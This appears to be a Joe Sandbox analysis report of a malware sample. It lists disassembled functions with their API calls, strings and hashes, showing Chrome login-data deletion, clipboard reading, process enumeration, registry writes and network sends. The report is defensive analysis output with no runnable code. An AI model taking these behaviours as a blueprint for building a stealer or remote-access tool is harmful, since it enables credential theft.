                                                                                                                                                                Function 6FE7D170 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00001000,?,00001000), ref: 6FE7D1EC
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,00000000), ref: 6FE7D21C
                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000001,6FE7CFF7,00000000), ref: 6FE7D26D
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6FE7D483
                                                                                                                                                                Strings
                                                                                                                                                                • 8o, xrefs: 6FE7D4F9, 6FE7D502
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FE7D4E9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ConsoleWrite$ByteCharErrorLastMultiWide
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$8o
                                                                                                                                                                • API String ID: 3036337926-1020289318
                                                                                                                                                                • Opcode ID: 4a08d1f98112b0dc7e2ee7231b65629e2e5d7d8471de64969ed0f28b4d662633
                                                                                                                                                                • Instruction ID: b1abcd18a74866846b2254a4e2e2b63d35bdf17b8f471b46997e64a2d5b7e599
                                                                                                                                                                • Opcode Fuzzy Hash: 4a08d1f98112b0dc7e2ee7231b65629e2e5d7d8471de64969ed0f28b4d662633
                                                                                                                                                                • Instruction Fuzzy Hash: C29159359297825AE7228B3DC84276AFF95AFD3394F24D72BF99036191FB31D1818305
                                                                                                                                                                Function 000722DB Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 388registrylibraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000723AE
                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000723BA
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0007258A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00072591
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                • API String ID: 2127411465-314212984
                                                                                                                                                                • Opcode ID: 61fa17b2d2ebe33f079f1c6e5e2ab5eca18e538356748098a639a77e926823f5
                                                                                                                                                                • Instruction ID: 5f704ee2020ac9c3207f6a1e7e717773356925a9caa93beb4228b41639f69ac9
                                                                                                                                                                • Opcode Fuzzy Hash: 61fa17b2d2ebe33f079f1c6e5e2ab5eca18e538356748098a639a77e926823f5
                                                                                                                                                                • Instruction Fuzzy Hash: C6C1D571A0830067CA18FB74CC97DEE77AAAFA1700F44452DF946971D7EE699A08C392
                                                                                                                                                                Function 0006B5CA Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data,00000000), ref: 0006B606
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0006B610
                                                                                                                                                                Strings
                                                                                                                                                                • UserProfile, xrefs: 0006B5D6
                                                                                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0006B636
                                                                                                                                                                • [Chrome StoredLogins not found], xrefs: 0006B62A
                                                                                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0006B5D1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                • API String ID: 2018770650-1062637481
                                                                                                                                                                • Opcode ID: 048c9789249a44ac6850030868948b8978d430d54d5ff894f2f51bb62010d6d0
                                                                                                                                                                • Instruction ID: 15d70329a273a8c83529c9949d3e7d7b755c5530d87c8f2427c67c2ed065ec77
                                                                                                                                                                • Opcode Fuzzy Hash: 048c9789249a44ac6850030868948b8978d430d54d5ff894f2f51bb62010d6d0
                                                                                                                                                                • Instruction Fuzzy Hash: FD01D1B1A844085BAA18BB74DC179FE7BAAAF21301B401119F50297193EF564948C6D2
                                                                                                                                                                Function 000AF090 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,000AF3AF,?,00000000), ref: 000AF129
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,000AF3AF,?,00000000), ref: 000AF152
                                                                                                                                                                • GetACP.KERNEL32(?,?,000AF3AF,?,00000000), ref: 000AF167
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                • String ID: ACP$OCP
                                                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                                                • Opcode ID: fe1296cb608636f0d82e3a11850c20b0147e1813ff4eaf1ae22df143c89f51e7
                                                                                                                                                                • Instruction ID: 1994f5782aa24c479fbdf2f8f926f49ed0c4bcafdfbb90abad87d09412833fab
                                                                                                                                                                • Opcode Fuzzy Hash: fe1296cb608636f0d82e3a11850c20b0147e1813ff4eaf1ae22df143c89f51e7
                                                                                                                                                                • Instruction Fuzzy Hash: 7F218362740106EAEBB58FD4C901EF7B3E6EB56F60B568574E909D7205E732DD40C390
                                                                                                                                                                Function 0006919E Relevance: 7.7, APIs: 5, Instructions: 246fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog.LIBCMT ref: 000691A3
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0006921B
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00069244
                                                                                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0006925B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseFirstH_prologNextchar_traits
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3260228402-0
                                                                                                                                                                • Opcode ID: 3d2cbabdc6861b65a730f276497d80b2b6043d21d25c72c2964fe047433d1a6f
                                                                                                                                                                • Instruction ID: 5d49f728c3b808827401bc468ebffec62bb1b73d1ada3dc125c8802bad1979e6
                                                                                                                                                                • Opcode Fuzzy Hash: 3d2cbabdc6861b65a730f276497d80b2b6043d21d25c72c2964fe047433d1a6f
                                                                                                                                                                • Instruction Fuzzy Hash: 2D9122329001199BDB15FFA0DC92EED73BABF24314F54426AE406A71A2EF359F49CB50
                                                                                                                                                                Function 00068290 Relevance: 7.7, APIs: 5, Instructions: 210fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __EH_prolog.LIBCMT ref: 00068295
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,000C2978,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0006834E
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00068376
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00068383
                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000684E3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1771804793-0
                                                                                                                                                                • Opcode ID: 42ac7d3c68e989d9a68d1c8820c679e8edfef54c4a54b24adca28e655dc88001
                                                                                                                                                                • Instruction ID: d9b6e0c9c16862a251a01bcbe0f584f1614f30b3d3c8a8b40975f2050d2dd399
                                                                                                                                                                • Opcode Fuzzy Hash: 42ac7d3c68e989d9a68d1c8820c679e8edfef54c4a54b24adca28e655dc88001
                                                                                                                                                                • Instruction Fuzzy Hash: F27182729001199ADF04FFA0DC56AED77BBAF20310F948269F806A7193EF349B49C791
                                                                                                                                                                Function 000AF264 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 000A38D4: GetLastError.KERNEL32(00000000,?,00098255,?,?,?,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A38D8
                                                                                                                                                                  • Part of subcall function 000A38D4: _free.LIBCMT ref: 000A390B
                                                                                                                                                                  • Part of subcall function 000A38D4: SetLastError.KERNEL32(00000000,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A394C
                                                                                                                                                                  • Part of subcall function 000A38D4: _abort.LIBCMT ref: 000A3952
                                                                                                                                                                  • Part of subcall function 000A38D4: _free.LIBCMT ref: 000A3933
                                                                                                                                                                  • Part of subcall function 000A38D4: SetLastError.KERNEL32(00000000,00099B61,?,0008B9D1,00000000,?,00000000,?,?,0008B9D1), ref: 000A3940
                                                                                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 000AF370
                                                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 000AF3CB
                                                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 000AF3DA
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,000A40B7,00000040,?,000A41D7,00000055,00000000,?,?,00000055,00000000), ref: 000AF422
                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,000A4137,00000040), ref: 000AF441
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 745075371-0
                                                                                                                                                                • Opcode ID: f4c5f2cd42ac881aee99ac8f37b391e60408558d1acd6678097a4fd7e7f4dead
                                                                                                                                                                • Instruction ID: 010c876f12b7659585bcd9bd0f84ff0ab17f970455be82410678f74ed74a18cc
                                                                                                                                                                • Opcode Fuzzy Hash: f4c5f2cd42ac881aee99ac8f37b391e60408558d1acd6678097a4fd7e7f4dead
                                                                                                                                                                • Instruction Fuzzy Hash: 1D517072A00206ABEF60DFE5CC45AFEB7F8BF0A741F144535B910EB151EB749A008B61
                                                                                                                                                                Function 6FE7C910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90filenativesynchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtWriteFile.NTDLL ref: 6FE7C975
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FE7C985
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6FE7C9A5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectSingleStatusWaitWrite
                                                                                                                                                                • String ID: xJo
                                                                                                                                                                • API String ID: 3447438843-2290625176
                                                                                                                                                                • Opcode ID: 4dd375d0cd7bcddb0d37fa74537fddfd36b93303432dcce67076098ed79f1d35
                                                                                                                                                                • Instruction ID: 10da3219495d88b8391434afb417ca217dd4f4cd0f373b721b217fa56087ab61
                                                                                                                                                                • Opcode Fuzzy Hash: 4dd375d0cd7bcddb0d37fa74537fddfd36b93303432dcce67076098ed79f1d35
                                                                                                                                                                • Instruction Fuzzy Hash: 97317571608305AFE710CF15C884B9BBFE9EBC5358F108A2DF49897290D774E949CB92
                                                                                                                                                                Function 000672F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 0006730B
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 000673CB
                                                                                                                                                                  • Part of subcall function 00064BE3: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00064C56
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                                                                                • String ID: 8 $8
                                                                                                                                                                • API String ID: 4113138495-398533010
                                                                                                                                                                • Opcode ID: fb326f5b69fa743b6d70ab9895f7e652942126d270d36c317d27b965d0d24f66
                                                                                                                                                                • Instruction ID: 452503a39dc56a5399042870a76c34758b6ed92e1213c5f6051d8215c7afe396
                                                                                                                                                                • Opcode Fuzzy Hash: fb326f5b69fa743b6d70ab9895f7e652942126d270d36c317d27b965d0d24f66
                                                                                                                                                                • Instruction Fuzzy Hash: 5A218031914519AADB14FBA0CC96EEE777EEF51300F400265F906A7193EF345B89CB91
                                                                                                                                                                Function 6FE9E890 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8d81f1fe60c73427d847faae55ee68d9ab69495bc3c3f769d884acf350b1a978
                                                                                                                                                                • Instruction ID: d9ebebe6630986cf26d89e0a0e09e420750f45df2973fd0f5af946e7510fe6d1
                                                                                                                                                                • Opcode Fuzzy Hash: 8d81f1fe60c73427d847faae55ee68d9ab69495bc3c3f769d884acf350b1a978
                                                                                                                                                                • Instruction Fuzzy Hash: 49023071E016199FDB14CFA9C99069EFBF1FF48314F25826AD915EB380D731A941CBA0
                                                                                                                                                                Function 0006E45A Relevance: 6.1, APIs: 4, Instructions: 127processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007A124: GetCurrentProcess.KERNEL32(000D2318,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A135
                                                                                                                                                                  • Part of subcall function 0007A124: IsWow64Process.KERNEL32(00000000,?,?,000795B5,00000000,Shellcode,000D2318,DLL,00000000,0000000E,00000000,000C278C,00000003,00000000), ref: 0007A13C
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0006E47A
                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0006E49C
                                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0006E623
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0006E632
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProcessProcess32$CloseCreateCurrentFirstHandleNextSnapshotToolhelp32Wow64
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 715332099-0
                                                                                                                                                                • Opcode ID: e6cd2c4101f88c2af9b56952ce11c6731c5424387da528e48cf84da8bc6aee79
                                                                                                                                                                • Instruction ID: 0b2b82d9929093d18291ee3e55a2eeb9c6357d648f72018d0dda7642d462de47
                                                                                                                                                                • Opcode Fuzzy Hash: e6cd2c4101f88c2af9b56952ce11c6731c5424387da528e48cf84da8bc6aee79
                                                                                                                                                                • Instruction Fuzzy Hash: 5F414D31A145189BEB29FB60DC52BEEB37BAF54300F1041A9B00AA6193EE345F89CB51
                                                                                                                                                                Function 6FE91134 Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6FE91140
                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6FE9120C
                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6FE91225
                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6FE9122F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                • Opcode ID: ca0dd74ff3ae37e12e7dc868f36f6c8522645f415e01ea57fc3a98a401c22fa4
                                                                                                                                                                • Instruction ID: 0bde98679ed1c03d18495c0c3061a08412989636e25f18e5150c32da315e95a4
                                                                                                                                                                • Opcode Fuzzy Hash: ca0dd74ff3ae37e12e7dc868f36f6c8522645f415e01ea57fc3a98a401c22fa4
                                                                                                                                                                • Instruction Fuzzy Hash: F931F675D05318DBDF21DFA5D8897CDBBB8AF09304F1041AAE40CAB280EB759A849F55
                                                                                                                                                                Function 0006B2B5 Relevance: 4.5, APIs: 3, Instructions: 22clipboardCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0006B2BB
                                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0006B2C7
                                                                                                                                                                • CloseClipboard.USER32 ref: 0006B2CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2058664381-0
                                                                                                                                                                • Opcode ID: 7173378b8d83ddb26483eec24d719cfef6c2aa372f32af207c525230e285bc25
